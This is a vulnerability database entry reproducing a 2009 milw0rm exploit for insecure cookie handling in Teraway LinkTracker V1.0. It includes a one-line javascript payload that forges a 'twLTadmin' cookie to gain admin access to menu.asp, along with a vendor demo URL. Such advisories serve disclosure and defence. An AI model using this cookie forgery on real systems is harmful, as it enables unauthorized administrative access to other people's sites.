Teraway LinkTracker V1.0 Insecure Cookie Handling Vuln

vendor:

LinkTracker

by:

milw0rm.com

7,5

CVSS

HIGH

Insecure Cookie Handling

614

CWE

Product Name: LinkTracker

Affected Version From: V1.0

Affected Version To: V1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:teraway:linktracker:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Teraway LinkTracker V1.0 Insecure Cookie Handling Vuln

An attacker can exploit this vulnerability by setting a malicious cookie with the 'twLTadmin' parameter. The cookie should contain the userid and the level of the user. The attacker can then access the menu.asp page with the privileges of the user.

Mitigation:

The application should validate the cookie before using it.

Source

Exploit-DB raw data:

-------------------------------------[+]
Homepage:http://www.teraway.com
Product: Teraway LinkTracker V1.0
home:www.h4ckf0ru.com
Note: Hawach x.CJP.x Ballk Ma tedirech Ihdae
Note: Ø³Ø§Ù„ Ø§Ù„Ù…Ù…ÙƒÙ† Ø§Ù„Ù…Ø³ØªØÙŠÙ„ Ø§ÙŠÙ† ØªÙ‚ÙŠÙ… Ù‚Ø§Ù„ ÙÙŠ Ø§ØÙ„Ø§Ù… Ø§Ù„Ø¹Ø§Ø¬Ø²
-------------------------------------
Teraway LinkTracker V1.0 Insecure Cookie Handling Vuln
-------------------------------------
Exploit:
--------

javascript:document.cookie="twLTadmin=userid=1&lvl=1;path=/";
Then Go to  http://victim/path/menu.asp

demo
----
http://www.teraway.com/linktracker/demo/login.asp


--------------------------------------------------
 Greetz to :
[+] Super_Cristal (My Master) Dos-Dz Team Snakes TeaM
SuB-ZeRo x.CJP.x Mr.tro0oqy - Cyber-Zone-  ZoRLu
And ALL Members Of anti-intruders.org  
ALL My Friends (Dz)
[+]-------------------------------------[+] 

# milw0rm.com [2009-04-27]